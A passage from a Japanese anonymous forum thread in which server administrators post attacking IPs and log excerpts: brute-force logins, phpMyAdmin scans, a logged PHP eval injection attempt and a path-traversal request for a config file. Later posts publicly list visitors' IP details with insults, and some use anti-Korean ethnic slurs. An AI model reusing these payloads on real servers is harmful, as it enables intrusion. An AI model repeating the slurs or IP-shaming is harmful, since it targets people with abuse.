国内なら相手ISPにログ付きで苦情を送れ。大抵それで方がつく。
128DNS未登録さん:2012/03/14(水) 12:25:43.44 ID:???
甘いところだと注意しただけで大して変わらないこともあるけどね
厳しいところは一発で回線停止されるけど
odnはどうだったかな…
129DNS未登録さん:2012/03/25(日) 17:27:49.33 ID:???
"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
8000行あった。数秒おきに 16時間・・・
130DNS未登録さん:2012/05/11(金) 23:49:56.91 ID:???
64.27.15.56 アメリカunassigned.calpop.com
メール鯖にアタックしてくる
131DNS未登録さん:2012/05/12(土) 19:12:28.08 ID:???
116.126.87.154 韓国
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1

他137種類のattack
???
132DNS未登録さん:2012/05/13(日) 23:47:03.33 ID:???
日本国内からのポートスキャン、クラックツール実行

49.252.168.148
EM49-252-168-148.pool.e-mobile.ne.jp.
133DNS未登録さん:2012/05/25(金) 10:24:33.62 ID:???
217.41.19.142

dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
134DNS未登録さん:2012/05/28(月) 11:47:02.67 ID:???
[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql
135DNS未登録さん:2012/05/31(木) 00:08:01.47 ID:???
日本国内からくる奴は、OCNが多いが理由があるのだろうか?
136DNS未登録さん:2012/05/31(木) 02:45:10.02 ID:???
ユーザ数
137DNS未登録さん:2012/05/31(木) 22:48:38.01 ID:???
YokozunaNETという謎のISPからDDOS食らった
138DNS未登録さん:2012/06/01(金) 11:34:04.46 ID:???
モンゴルかw
139DNS未登録さん:2012/08/01(水) 22:49:19.71 ID:???
ポート22に侵入しようとしてくる
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp
140DNS未登録さん:2012/08/06(月) 04:40:39.11 ID:???
ssh(dd_ssh)攻撃

1.33.202.193
el-labo-s1.el-labo.jp
141DNS未登録さん:2012/08/13(月) 09:46:36.18 ID:???
このスレまだあるんだね。
ssh対策なら、denyhosts動かしておけば自動収集してくれるのに。
purge_deny=1yにしておいたら、こんなに収集してくれたよ。

% egrep ^sshd /etc/hosts.deny | wc -l
968
142DNS未登録さん:2012/08/15(水) 17:20:46.24 ID:???
218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-
143DNS未登録さん:2012/08/17(金) 07:53:18.68 ID:???
>>141
こいつ馬鹿だわ
期間も書かずに、こんなにとか言ってるし
144DNS未登録さん:2012/08/19(日) 17:46:16.25 ID:???
夏だねぇ。
purge_deny=1y
の意味ぐらい調べてから書けば良いのに。
145DNS未登録さん:2012/08/19(日) 19:09:29.95 ID:???
そういう意味じゃないと思われ
夏だな、電波野郎しかいないのか
146DNS未登録さん:2012/08/21(火) 16:50:28.60 ID:???
2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"
147DNS未登録さん:2012/08/22(水) 21:59:46.11 ID:???
1年でpurgeするのだから、1年分の収集だろうが... ヤレヤレ。
148DNS未登録さん:2012/09/18(火) 20:47:17.39 ID:Iu7w4W0H
203.91.121.70

毎日一万回以上うちのサーバーにssh総当たりしてくる

何か怖い
149DNS未登録さん:2012/09/19(水) 00:57:11.55 ID:???
>>148
そう思ってる奴は他にもいる
ttp://ip-address-lookup-v4.com/ip/203.91.121.70
150DNS未登録さん:2012/09/22(土) 21:35:02.21 ID:???
58.183.165.251
違法物をやりとりするサーバーを立てています。
http://awabi.2ch.net/test/read.cgi/download/1347785389/
このスレで ID:SLuCn6vK0 大暴れしている
女子供を晒しアゲ中傷の嵐
151DNS未登録さん:2012/09/22(土) 22:15:45.61 ID:???
>150
違法なら警察へGO!
警察庁:都道府県警察本部のサイバー犯罪相談窓口等一覧
http://www.npa.go.jp/cyber/soudan.htm
152DNS未登録さん:2012/10/02(火) 22:00:03.21 ID:???
今日メールサーバーへの攻撃がすげぇんだけど・・・
153DNS未登録さん:2012/10/05(金) 11:43:34.62 ID:???
>>152 こいつら?
12.7.145.50
12.71.117.172
12.238.210.67
24.39.213.154
24.97.64.230
24.103.52.22
24.123.56.246
24.186.3.95
24.234.155.80
50.75.160.114,
63.238.5.66
68.15.108.58
68.16.48.68
65.40.186.170
66.134.197.178
67.52.184.130
67.76.162.45
154DNS未登録さん:2012/10/05(金) 11:45:21.53 ID:???
67.112.239.113
70.43.109.131
70.60.238.70
72.89.191.60
70.255.147.109
108.64.133.67
108.71.19.30
108.162.17.130
173.12.143.130
173.44.136.74
173.162.218.11
173.200.3.25
209.132.232.92
209.166.158.116
216.1.42.19

以上のIPからうちのメールサーバーに数回ずつ短時間に連続して来てた
155DNS未登録さん:2012/12/15(土) 15:08:28.20 ID:???
【一部抜粋】
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<zaragoza>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<boullosa>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<capurro>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<phernandez>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<lucero>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<moreno>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx
dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<munoz>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx

ユーザ名変えて物凄い勢いで来てた
156DNS未登録さん:2013/02/09(土) 09:18:43.19 ID:???
66.161.176.108 - - [06/Feb/2013:21:06:40 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:10 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /db/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /PMA/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /pma/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /mysql/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /myadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /phpadmin/main.php HTTP/1.0" 404 1001 "-" "-"
66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /webadmin/main.php HTTP/1.0" 404 1001 "-" "-"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu"
157DNS未登録さん:2013/02/09(土) 09:21:02.01 ID:???
83.238.212.227 - - [06/Feb/2013:18:09:28 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:30 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
83.238.212.227 - - [06/Feb/2013:18:09:31 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu"
141.212.121.10 - - [05/Feb/2013:23:42:40 +0900] "\x80w\x01\x03\x01" 501 951 "-" "-"
MyAdminなんかねえよ馬鹿
158DNS未登録さん:2013/02/10(日) 20:46:55.12 ID:???
pmaアタックしょっちゅう来るよね
うちはディレクトリ名に誕生日入れてるから大丈夫
159DNS未登録さん:2013/02/14(木) 19:09:02.51 ID:???
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-"
126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-"

softbank126009120142.bbtec.netで検索すると大量に引っかかるから踏み台経由なんだろう
160DNS未登録さん:2013/02/22(金) 17:41:03.39 ID:???
俺の名前は脱糞マン 今日も脱糞もりもりー!
161DNS未登録さん:2013/05/31(金) 21:16:51.20 ID:EB7lGreO
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
46.249.33.47 - - [31/May/2013:18:21:29 +0900] "GET /epgrec/systemSetting.php HTTP/1.1" 404 1062 "-" "-"
162DNS未登録さん:2013/08/05(月) NY:AN:NY.AN ID:94vJNvT+
IPアドレス 118.22.250.219
ホスト名 p3219-ipngn1202marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

F5連打やめろカス野郎!!
163DNS未登録さん:2013/08/08(木) NY:AN:NY.AN ID:mX0qXlbe
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144
110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144
164DNS未登録さん:2013/08/16(金) NY:AN:NY.AN ID:9nzUfPAp
IPアドレス 219.33.248.7
ホスト名 softbank219033248007.bbtec.net
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 xDSL
都道府県 愛知県
165DNS未登録さん:2013/08/16(金) NY:AN:NY.AN ID:9nzUfPAp
softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:47

error 403

softbank219033248007.bbtec.net

/img/ic_p_hand.gif

13/08/167:46

error 403
166DNS未登録さん:2013/08/16(金) NY:AN:NY.AN ID:9nzUfPAp
IPアドレス 103.28.96.56
ホスト名 dhcp38056.orihime.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 該当なし
都道府県 該当なし
167DNS未登録さん:2013/08/23(金) NY:AN:NY.AN ID:nLRBGm+O
IPアドレス 61.46.103.148
ホスト名 zaq3d2e6794.zaq.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 CATV
都道府県 大阪府
168DNS未登録さん:2013/08/26(月) NY:AN:NY.AN ID:fpjUopE0
IPアドレス 123.225.228.170
ホスト名 p3170-ipbf1705sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道
169DNS未登録さん:2013/08/26(月) NY:AN:NY.AN ID:OJcg0k54
27.102.192.140からssh

/var/log/auth.log
Aug 26 06:24:32 ***** sshd[13852]: Invalid user bart from 27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: input_userauth_request: invalid user bart [preauth]
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): check pass; user unknown
Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.102.192.140
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): getting password (0x00000388)
Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): pam_get_item returned a password
Aug 26 06:24:34 ***** sshd[13852]: Failed password for invalid user bart from 27.102.192.140 port 33426 ssh2
Aug 26 06:24:34 ***** sshd[13852]: Received disconnect from 27.102.192.140: 11: Bye Bye [preauth]
170DNS未登録さん:2013/08/29(木) NY:AN:NY.AN ID:tF8Whh+x
IPアドレス 111.108.19.55
ホスト名 kd111108019055.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 栃木県
171DNS未登録さん:2013/08/30(金) NY:AN:NY.AN ID:6dzYV3Q5
IPアドレス 223.25.160.33
ホスト名 g1-223-25-160-33.bmobile.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 該当なし
都道府県 該当なし
172DNS未登録さん:2013/08/31(土) NY:AN:NY.AN ID:tNHoGxV9
IPアドレス 106.177.13.31
ホスト名 kd106177013031.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 該当なし
173DNS未登録さん:2013/09/02(月) 16:28:44.06 ID:TxMBkHkr
IPアドレス 118.21.111.71
ホスト名 i118-21-111-71.s30.a048.ap.plala.or.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 該当なし
174DNS未登録さん:2013/09/03(火) 17:33:44.20 ID:???
KD106177151101.ppp-bb.dion.ne.jp
175DNS未登録さん:2013/09/11(水) 22:33:45.90 ID:???
IPアドレス 125.1.164.67
ホスト名 nttkyo455067.tkyo.nt.ngn2.ppp.infoweb.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都
176DNS未登録さん:2013/09/18(水) 18:52:43.64 ID:LV75/hp7
IPアドレス 153.160.118.147
ホスト名 p7147-ipngn4701marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

F5連打キチガイ
177DNS未登録さん:2013/09/26(木) 10:43:46.87 ID:H3fwxe36
IPアドレス 220.2.96.8
ホスト名 softbank220002096008.bbtec.net
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 xDSL
都道府県 静岡県

しつけーよカスヤルァー!!
二度と来るなよ!!
178DNS未登録さん:2013/09/28(土) 12:03:51.71 ID:VCik+XYP
IPアドレス 106.159.106.72
ホスト名 KD106159106072.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 北海道
179DNS未登録さん:2013/09/29(日) 19:52:16.89 ID:1SD9W5dU
IPアドレス 58.183.196.116
ホスト名 116.196.183.58.megaegg.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 広島県

F5連打うぜえ
180DNS未登録さん:2013/10/03(木) 22:55:20.49 ID:VT6xWLU1
IPアドレス 61.193.122.189
ホスト名 flh1adk189.hkd.mesh.ad.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道
181DNS未登録さん:2013/10/26(土) 17:45:20.67 ID:7I33GS7j BE:287314447-PLT(27717)
IPアドレス 121.84.32.120
ホスト名 121-84-32-120f1.hyg2.eonet.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 兵庫県

消え失せろクズ野郎!!
邪魔なんだよ!!
182DNS未登録さん:2013/10/27(日) 22:37:50.15 ID:bwjv7tIF
IPアドレス 114.167.56.193
ホスト名 p1193-ipbf2406sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

消え失せろクズ野郎!!
邪魔なんだよ!!
183DNS未登録さん:2013/11/08(金) 23:37:18.06 ID:+w98rXs3
IPアドレス 114.20.150.51
ホスト名 KD114020150051.ppp.prin.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 PHS
都道府県 該当なし

ブログ荒らしの糞チョン
184DNS未登録さん:2013/11/08(金) 23:43:48.40 ID:+w98rXs3
ファビョった朝鮮人うぜー
185DNS未登録さん:2013/11/09(土) 08:14:46.27 ID:eIre5eR+
リモートホスト i121-117-132-189.s41.a030.ap.plala.or.jp
IPアドレス 121.117.132.189

くだらんクエリ文字列付きでアクセスしてんじゃねーよクズ!!
186DNS未登録さん:2013/11/10(日) 14:21:40.13 ID:???
IPアドレス 112.216.76.110

2013年11月08日(金)1時間弱の間にSMTP鯖に5972回不正アクセス
187DNS未登録さん:2013/11/10(日) 17:35:26.12 ID:???
1分に100回?なんかミスったんじゃないのw
188DNS未登録さん:2013/11/10(日) 19:06:57.94 ID:???
ミスって何?
ユーザー名とpass ランダムに変えてたから総当たりスクリプトだろ
189DNS未登録さん:2013/11/10(日) 19:39:49.84 ID:cVHzLtoH
IPアドレス 113.147.246.150
ホスト名 KD113147246150.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

くんじゃねーよクズ野郎!!
190DNS未登録さん:2013/11/10(日) 20:43:43.12 ID:cVHzLtoH
今日も韓国人を叩く某ブログで

ウィルコムプロバイダのチョンが発狂しています

いい加減そろそろ通報しようと思う。
191DNS未登録さん:2013/11/10(日) 20:54:43.23 ID:cVHzLtoH
2013-11-10 20:35:19
記事 Tomo's Blog
ブラウザ Mozilla/3.0(WILLCOM;KYOCERA/WX01K/2;2.0.3.14.000000/1/C256) NetFront/3.4
リモートホスト 114.20.150.165 (KD114020150165.ppp.prin.ne.jp)

IP晒します。

IPアドレス 114.20.150.165
ホスト名 KD114020150165.ppp.prin.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 PHS
都道府県 該当なし

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 114.20.128.0/17
b. [ネットワーク名] DP-PACKET2
f. [組織名] 株式会社ウィルコム
g. [Organization] WILLCOM, Inc.
192DNS未登録さん:2013/11/11(月) 00:27:08.99 ID:lmKWIlMp
お前さ、詮索してきてんじゃねーよ!!

2013-11-10 22:45:35
記事 Tomo's Blog
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:48:23
記事 Tomo's Blog
リファラ 俺の他のサイト
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:48:39
記事 ブログ開設しました!
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)

2013-11-10 22:49:26
記事 Tomo's Blog
リファラ http://blog.livedoor.jp/oboega/lite/archives/34528159/comments/7759059/?p=19
ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp)
193DNS未登録さん:2013/11/11(月) 00:28:43.93 ID:lmKWIlMp
誰が不人気だ、俺のブログはページランク4だぞ

なめんじゃねーぞコラ!!
194DNS未登録さん:2013/11/11(月) 00:30:40.07 ID:lmKWIlMp
そろそろチョン野郎をアク禁にするか。
195DNS未登録さん:2013/11/11(月) 12:47:25.88 ID:???
>>188
単にSMTPとしか書いて無かったらメール転送のリトライだと思うだろう
196DNS未登録さん:2013/11/13(水) 18:35:10.97 ID:???
サブミッションじゃね?

知らないけど。
197DNS未登録さん:2013/11/20(水) 15:11:20.22 ID:4DZV18u4
IPアドレス 162.210.196.165
ホスト名 対応するホスト名がありません。
IPアドレス割当国 アメリカ合衆国 ( us )
市外局番 該当なし
接続回線 該当なし
都道府県 該当なし

邪魔だよデコスケ
198DNS未登録さん:2013/11/21(木) 15:00:19.78 ID:omIbxvki
IPアドレス 122.18.75.228
ホスト名 p1228-ipbf802sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道


邪魔だよデコスケ
199DNS未登録さん:2013/11/23(土) 03:25:43.53 ID:???
netstatでよく出てくるgooglebotさん?なのかな
TCP <hostname>:2035 nrt04s05-in-f3.1e100.net:http TIME_WAIT

薄気味悪ぃーくらいに出てくる
うちは単なるクライアント環境だし外部向けには何も公開していないんだが
javascript切ってGoogleにアクセスすると
必ずと言っていいほどにしばらくの間このドメインから訪問を受ける
200DNS未登録さん:2013/11/29(金) 07:53:33.12 ID:???
FFの悪意のあるサイトのブロック切れ。
201DNS未登録さん:2013/12/02(月) 01:09:52.19 ID:???
アタックまじうぜえ
202DNS未登録さん:2013/12/09(月) 16:14:04.15 ID:???
IPアドレス 182.250.240.2
ホスト名 KD182250240002.au-net.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 該当なし

しつけーぞカスヤルァー!!
203DNS未登録さん:2013/12/15(日) 19:47:37.13 ID:??? BE:153918353-PLT(27717)
IPアドレス 115.65.5.170
ホスト名 g170.115-65-5.ppp.wakwak.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 青森県

しつけーぞカスヤルァー!!
204DNS未登録さん:2013/12/15(日) 19:53:06.43 ID:??? BE:82090324-PLT(27717)
IPアドレス 123.224.187.59
ホスト名 p2059-ipbf4102marunouchi.tokyo.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

おまえもだ
邪魔
205DNS未登録さん:2013/12/17(火) 15:42:02.25 ID:???
IPアドレス 119.105.170.249
ホスト名 KD119105170249.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 東京都

邪魔だよゴミ!!
206DNS未登録さん:2013/12/19(木) 21:53:35.50 ID:??? BE:246269838-PLT(27717)
IPアドレス 122.16.37.149
